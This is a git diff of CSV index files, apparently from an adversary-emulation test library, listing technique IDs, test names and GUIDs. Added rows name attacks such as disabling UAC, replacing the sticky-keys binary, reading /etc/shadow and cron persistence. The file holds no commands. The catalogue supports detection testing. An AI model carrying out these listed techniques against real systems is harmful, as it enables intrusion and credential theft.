@@ -16,12 +17,14 @@ privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fod privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell +privilege-escalation,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell privilege-escalation,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe 
binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt @@ -63,6 +66,7 @@ privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell +privilege-escalation,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh 
@@ -86,6 +90,7 @@ privilege-escalation,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon P persistence,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh persistence,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh persistence,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell +persistence,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt persistence,T1098,Account Manipulation,1,Admin Account Manipulate,5598f7cb-cf43-455e-883a-f6008c5d46af,powershell persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell persistence,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt 
@@ -107,13 +112,15 @@ persistence,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce persistence,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell persistence,T1546.001,Change Default File Association,1,Change Default File Association,10a08978-2045-4d62-8c42-1957bbbea102,command_prompt persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash persistence,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt persistence,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt persistence,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt persistence,T1136.002,Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt persistence,T1136.002,Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh +persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell persistence,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt persistence,T1546.012,Image File Execution Options 
Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash @@ -152,6 +159,7 @@ persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell +persistence,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt persistence,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt persistence,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell persistence,T1037.005,Startup Items,1,Add file to Local Library StartupItems,134627c3-75db-410e-bff8-7a920075f198,sh 
@@ -166,6 +174,8 @@ persistence,T1543.003,Windows Service,3,Service Installation PowerShell,491a4af6 persistence,T1547.004,Winlogon Helper DLL,1,Winlogon Shell Key Persistence - PowerShell,bf9f9d65-ee4d-4c3e-a843-777d04f19c38,powershell persistence,T1547.004,Winlogon Helper DLL,2,Winlogon Userinit Key Persistence - PowerShell,fb32c935-ee2e-454b-8fa3-1c46b42e8dfb,powershell persistence,T1547.004,Winlogon Helper DLL,3,Winlogon Notify Key Logon Persistence - PowerShell,d40da266-e073-4e5a-bb8b-2b385023e5f9,powershell +credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash +credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell credential-access,T1552.001,Credentials In Files,1,Extract Browser and System credentials with LaZagne,9e507bb8-1d30-4e3b-a49b-cb5727d7ea79,bash 
@@ -230,6 +240,7 @@ defense-evasion,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelpe defense-evasion,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell +defense-evasion,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell 
@@ -423,6 +434,7 @@ defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-c defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell +defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh defense-evasion,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh 
@@ -457,7 +469,8 @@ defense-evasion,T1134.001,Token Impersonation/Theft,2,`SeDebugPrivilege` token d defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1,Take ownership using takeown utility,98d34bb4-6e75-42ad-9c41-1dae7dc6a001,command_prompt defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt -defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,powershell +defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt +defense-evasion,T1222.001,Windows File and Directory Permissions Modification,5,Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,powershell defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt 
@@ -592,6 +605,7 @@ discovery,T1016,System Network Configuration Discovery,3,System Network Configur discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style),dafaf052-5508-402d-bf77-51e0700c02e2,command_prompt discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports,4b467538-f102-491d-ace7-ed487b853bf5,powershell discovery,T1016,System Network Configuration Discovery,6,Adfind - Enumerate Active Directory Subnet Objects,9bb45dd7-c466-4f93-83a1-be30e56033ee,command_prompt +discovery,T1016,System Network Configuration Discovery,7,Qakbot Recon,121de5c6-5818-4868-b8a7-8fd07c455c1b,command_prompt discovery,T1049,System Network Connections Discovery,1,System Network Connections Discovery,0940a971-809a-48f1-9c4d-b1d785e96ee5,command_prompt discovery,T1049,System Network Connections Discovery,2,System Network Connections Discovery with PowerShell,f069f0f1-baad-4831-aa2b-eddac4baac4a,powershell discovery,T1049,System Network Connections Discovery,3,System Network Connections Discovery Linux & MacOS,9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh 
@@ -606,7 +620,8 @@ execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2 execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +execution,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash execution,T1559.002,Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual execution,T1559.002,Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt execution,T1559.002,Dynamic Data Exchange,3,DDEAUTO,cf91174c-4e74-414e-bec0-8d60a104d181,manual 
@@ -736,5 +751,6 @@ exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell initial-access,T1566.001,Spearphishing Attachment,1,Download Phishing Attachment - VBScript,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index d20d8e79..5e0d0cf0 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv 
@@ -3,7 +3,8 @@ privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_ privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash privilege-escalation,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash privilege-escalation,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash 
@@ -22,7 +23,8 @@ persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4ab persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash persistence,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash persistence,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash 
@@ -31,6 +33,8 @@ persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh +credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash +credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash 
@@ -149,7 +153,8 @@ collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash execution,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +execution,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index 54e2c7eb..099d86f8 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv 
@@ -2,7 +2,7 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh privilege-escalation,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash privilege-escalation,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash @@ -27,7 +27,7 @@ persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +persistence,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash persistence,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh persistence,T1543.001,Launch Agent,1,Launch Agent,a5983dee-bf6c-4eaf-951c-dbc1a7b90900,bash persistence,T1543.004,Launch Daemon,1,Launch Daemon,03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf,bash 
@@ -127,7 +127,7 @@ discovery,T1049,System Network Connections Discovery,3,System Network Connection discovery,T1033,System Owner/User Discovery,2,System Owner/User Discovery,2a9b677d-a230-44f4-ad86-782df1ef108c,sh execution,T1059.002,AppleScript,1,AppleScript,3600d97d-81b9-4171-ab96-e4386506e2c2,sh execution,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash -execution,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash +execution,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash execution,T1569.001,Launchctl,1,Launchctl,6fb61988-724e-4755-a595-07743749d4e2,bash execution,T1053.004,Launchd,1,Event Monitor Daemon Persistence,11979f23-9b9d-482a-9935-6fc9cd022c3e,bash execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 76e517a5..6e04db29 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -1,5 +1,6 @@ Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell +privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt privilege-escalation,T1546.011,Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt privilege-escalation,T1546.011,Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell 
@@ -13,6 +14,7 @@ privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fod privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell +privilege-escalation,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell 
@@ -46,6 +48,7 @@ privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell +privilege-escalation,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt privilege-escalation,T1547.009,Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt privilege-escalation,T1547.009,Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell privilege-escalation,T1134.001,Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell 
@@ -69,6 +72,7 @@ defense-evasion,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelpe defense-evasion,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell +defense-evasion,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell 
